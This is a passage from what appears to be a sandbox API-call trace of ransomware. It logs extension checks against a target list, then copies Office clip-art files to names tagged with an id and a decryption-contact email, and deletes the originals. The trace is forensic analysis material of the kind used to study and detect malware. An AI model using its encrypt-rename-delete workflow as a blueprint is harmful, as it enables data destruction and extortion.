[0199.442] lstrlenW (lpString=".docx") returned 5 [0199.442] lstrcmpiW (lpString1=".docx", lpString2="5.WMF") returned -1 [0199.442] lstrlenW (lpString=".pdf") returned 4 [0199.442] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0199.442] lstrlenW (lpString=".xls") returned 4 [0199.442] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0199.442] lstrlenW (lpString=".xlsx") returned 5 [0199.442] lstrcmpiW (lpString1=".xlsx", lpString2="5.WMF") returned -1 [0199.442] lstrlenW (lpString=".ppt") returned 4 [0199.442] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0199.442] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198025.WMF") returned 68 [0199.442] lstrlenW (lpString=".zip") returned 4 [0199.443] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.443] lstrlenW (lpString=".rar") returned 4 [0199.443] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.443] lstrlenW (lpString=".bz2") returned 4 [0199.443] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0199.443] lstrlenW (lpString=".7z") returned 3 [0199.443] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0199.443] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198025.WMF") returned 68 [0199.443] lstrlenW (lpString=".dbf") returned 4 [0199.443] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.443] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198025.WMF") returned 68 [0199.443] lstrlenW (lpString=".1cd") returned 4 [0199.443] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0199.443] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198025.WMF") returned 68 [0199.443] lstrlenW (lpString=".jpg") returned 4 [0199.443] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0199.443] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.443] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.443] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198372.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198372.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0199.444] GetLastError () returned 0x0 [0199.444] ReadFile (in: hFile=0x38c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x6f9c, lpOverlapped=0x0) returned 1 [0199.676] WriteFile (in: hFile=0x39c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x6fa0, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x6fa0, lpOverlapped=0x0) returned 1 [0199.677] ReadFile (in: hFile=0x38c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0199.677] WriteFile (in: hFile=0x39c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0199.678] SetEndOfFile (hFile=0x39c) returned 1 [0199.678] CloseHandle (hObject=0x39c) returned 1 [0199.678] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.678] SetEndOfFile (hFile=0x38c) returned 1 [0199.679] CloseHandle (hObject=0x38c) returned 1 [0199.679] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198372.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0199.679] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198372.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198372.wmf")) returned 1 [0199.680] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198372.WMF") returned 68 [0199.680] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198372.WMF") returned 68 [0199.680] lstrlenW (lpString=".doc") returned 4 [0199.680] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0199.680] lstrlenW (lpString=".docx") returned 5 [0199.680] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0199.680] lstrlenW (lpString=".pdf") returned 4 [0199.680] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0199.680] lstrlenW (lpString=".xls") returned 4 [0199.680] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0199.680] lstrlenW (lpString=".xlsx") returned 5 [0199.680] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0199.680] lstrlenW (lpString=".ppt") returned 4 [0199.680] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0199.680] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198372.WMF") returned 68 [0199.680] lstrlenW (lpString=".zip") returned 4 [0199.680] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.680] lstrlenW (lpString=".rar") returned 4 [0199.680] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.680] lstrlenW (lpString=".bz2") returned 4 [0199.680] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0199.681] lstrlenW (lpString=".7z") returned 3 [0199.681] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0199.681] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198372.WMF") returned 68 [0199.681] lstrlenW (lpString=".dbf") returned 4 [0199.681] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.681] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198372.WMF") returned 68 [0199.681] lstrlenW (lpString=".1cd") returned 4 [0199.681] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0199.681] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198372.WMF") returned 68 [0199.681] lstrlenW (lpString=".jpg") returned 4 [0199.681] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0199.681] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.681] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.682] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198712.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198712.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0199.682] GetLastError () returned 0x0 [0199.682] ReadFile (in: hFile=0x38c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0xe17a, lpOverlapped=0x0) returned 1 [0199.776] WriteFile (in: hFile=0x39c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xe180, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xe180, lpOverlapped=0x0) returned 1 [0199.778] ReadFile (in: hFile=0x38c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0199.778] WriteFile (in: hFile=0x39c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0199.778] SetEndOfFile (hFile=0x39c) returned 1 [0199.778] CloseHandle (hObject=0x39c) returned 1 [0199.778] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.778] SetEndOfFile (hFile=0x38c) returned 1 [0199.779] CloseHandle (hObject=0x38c) returned 1 [0199.779] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198712.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0199.779] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198712.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198712.wmf")) returned 1 [0199.780] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198712.WMF") returned 68 [0199.780] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198712.WMF") returned 68 [0199.780] lstrlenW (lpString=".doc") returned 4 [0199.780] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0199.780] lstrlenW (lpString=".docx") returned 5 [0199.780] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0199.780] lstrlenW (lpString=".pdf") returned 4 [0199.780] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0199.780] lstrlenW (lpString=".xls") returned 4 [0199.780] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0199.780] lstrlenW (lpString=".xlsx") returned 5 [0199.780] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0199.781] lstrlenW (lpString=".ppt") returned 4 [0199.781] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0199.781] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198712.WMF") returned 68 [0199.781] lstrlenW (lpString=".zip") returned 4 [0199.781] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.781] lstrlenW (lpString=".rar") returned 4 [0199.781] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.781] lstrlenW (lpString=".bz2") returned 4 [0199.781] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0199.781] lstrlenW (lpString=".7z") returned 3 [0199.781] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0199.781] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198712.WMF") returned 68 [0199.781] lstrlenW (lpString=".dbf") returned 4 [0199.781] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.781] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198712.WMF") returned 68 [0199.781] lstrlenW (lpString=".1cd") returned 4 [0199.781] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0199.781] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198712.WMF") returned 68 [0199.781] lstrlenW (lpString=".jpg") returned 4 [0199.781] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0199.781] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.781] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.781] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199303.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199303.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0199.782] GetLastError () returned 0x0 [0199.782] ReadFile (in: hFile=0x38c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x7c4e, lpOverlapped=0x0) returned 1 [0199.914] WriteFile (in: hFile=0x39c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x7c50, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x7c50, lpOverlapped=0x0) returned 1 [0199.915] ReadFile (in: hFile=0x38c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0199.915] WriteFile (in: hFile=0x39c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0199.915] SetEndOfFile (hFile=0x39c) returned 1 [0199.915] CloseHandle (hObject=0x39c) returned 1 [0199.915] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.915] SetEndOfFile (hFile=0x38c) returned 1 [0199.916] CloseHandle (hObject=0x38c) returned 1 [0199.916] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199303.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0199.916] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199303.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199303.wmf")) returned 1 [0199.917] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199303.WMF") returned 68 [0199.917] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199303.WMF") returned 68 [0199.917] lstrlenW (lpString=".doc") returned 4 [0199.917] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0199.917] lstrlenW (lpString=".docx") returned 5 [0199.917] lstrcmpiW (lpString1=".docx", lpString2="3.WMF") returned -1 [0199.917] lstrlenW (lpString=".pdf") returned 4 [0199.917] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0199.917] lstrlenW (lpString=".xls") returned 4 [0199.917] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0199.917] lstrlenW (lpString=".xlsx") returned 5 [0199.917] lstrcmpiW (lpString1=".xlsx", lpString2="3.WMF") returned -1 [0199.917] lstrlenW (lpString=".ppt") returned 4 [0199.917] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0199.917] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199303.WMF") returned 68 [0199.917] lstrlenW (lpString=".zip") returned 4 [0199.917] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.917] lstrlenW (lpString=".rar") returned 4 [0199.917] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.917] lstrlenW (lpString=".bz2") returned 4 [0199.917] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0199.917] lstrlenW (lpString=".7z") returned 3 [0199.918] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0199.918] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199303.WMF") returned 68 [0199.918] lstrlenW (lpString=".dbf") returned 4 [0199.918] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.918] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199303.WMF") returned 68 [0199.918] lstrlenW (lpString=".1cd") returned 4 [0199.918] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0199.918] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199303.WMF") returned 68 [0199.918] lstrlenW (lpString=".jpg") returned 4 [0199.918] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0199.918] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.918] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.918] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199475.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199475.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0199.919] GetLastError () returned 0x0 [0199.919] ReadFile (in: hFile=0x38c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x1484, lpOverlapped=0x0) returned 1 [0200.058] WriteFile (in: hFile=0x39c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x1490, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x1490, lpOverlapped=0x0) returned 1 [0200.059] ReadFile (in: hFile=0x38c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0200.059] WriteFile (in: hFile=0x39c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0200.059] SetEndOfFile (hFile=0x39c) returned 1 [0200.059] CloseHandle (hObject=0x39c) returned 1 [0200.059] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.059] SetEndOfFile (hFile=0x38c) returned 1 [0200.060] CloseHandle (hObject=0x38c) returned 1 [0200.060] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199475.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0200.060] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199475.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199475.wmf")) returned 1 [0200.061] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199475.WMF") returned 68 [0200.061] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199475.WMF") returned 68 [0200.061] lstrlenW (lpString=".doc") returned 4 [0200.061] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0200.061] lstrlenW (lpString=".docx") returned 5 [0200.061] lstrcmpiW (lpString1=".docx", lpString2="5.WMF") returned -1 [0200.061] lstrlenW (lpString=".pdf") returned 4 [0200.061] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0200.061] lstrlenW (lpString=".xls") returned 4 [0200.061] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0200.061] lstrlenW (lpString=".xlsx") returned 5 [0200.061] lstrcmpiW (lpString1=".xlsx", lpString2="5.WMF") returned -1 [0200.061] lstrlenW (lpString=".ppt") returned 4 [0200.061] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0200.061] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199475.WMF") returned 68 [0200.061] lstrlenW (lpString=".zip") returned 4 [0200.061] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0200.062] lstrlenW (lpString=".rar") returned 4 [0200.062] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0200.062] lstrlenW (lpString=".bz2") returned 4 [0200.062] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0200.062] lstrlenW (lpString=".7z") returned 3 [0200.062] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0200.062] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199475.WMF") returned 68 [0200.062] lstrlenW (lpString=".dbf") returned 4 [0200.062] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0200.062] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199475.WMF") returned 68 [0200.062] lstrlenW (lpString=".1cd") returned 4 [0200.062] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0200.062] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199475.WMF") returned 68 [0200.062] lstrlenW (lpString=".jpg") returned 4 [0200.062] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0200.062] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.062] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.062] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200151.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200151.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0200.063] GetLastError () returned 0x0 [0200.063] ReadFile (in: hFile=0x38c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x2004, lpOverlapped=0x0) returned 1 [0200.130] WriteFile (in: hFile=0x39c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x2010, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x2010, lpOverlapped=0x0) returned 1 [0200.132] ReadFile (in: hFile=0x38c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0200.132] WriteFile (in: hFile=0x39c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0200.132] SetEndOfFile (hFile=0x39c) returned 1 [0200.132] CloseHandle (hObject=0x39c) returned 1 [0200.132] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.132] SetEndOfFile (hFile=0x38c) returned 1 [0200.133] CloseHandle (hObject=0x38c) returned 1 [0200.133] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200151.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0200.133] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200151.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200151.wmf")) returned 1 [0200.134] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200151.WMF") returned 68 [0200.134] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200151.WMF") returned 68 [0200.134] lstrlenW (lpString=".doc") returned 4 [0200.134] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0200.134] lstrlenW (lpString=".docx") returned 5 [0200.134] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1 [0200.134] lstrlenW (lpString=".pdf") returned 4 [0200.134] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0200.134] lstrlenW (lpString=".xls") returned 4 [0200.134] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0200.134] lstrlenW (lpString=".xlsx") returned 5 [0200.134] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1 [0200.134] lstrlenW (lpString=".ppt") returned 4 [0200.134] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0200.134] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200151.WMF") returned 68 [0200.134] lstrlenW (lpString=".zip") returned 4 [0200.134] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0200.134] lstrlenW (lpString=".rar") returned 4 [0200.134] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0200.134] lstrlenW (lpString=".bz2") returned 4 [0200.134] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0200.134] lstrlenW (lpString=".7z") returned 3 [0200.134] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0200.134] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200151.WMF") returned 68 [0200.134] lstrlenW (lpString=".dbf") returned 4 [0200.134] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0200.135] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200151.WMF") returned 68 [0200.135] lstrlenW (lpString=".1cd") returned 4 [0200.135] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0200.135] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200151.WMF") returned 68 [0200.135] lstrlenW (lpString=".jpg") returned 4 [0200.135] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0200.135] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.135] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, 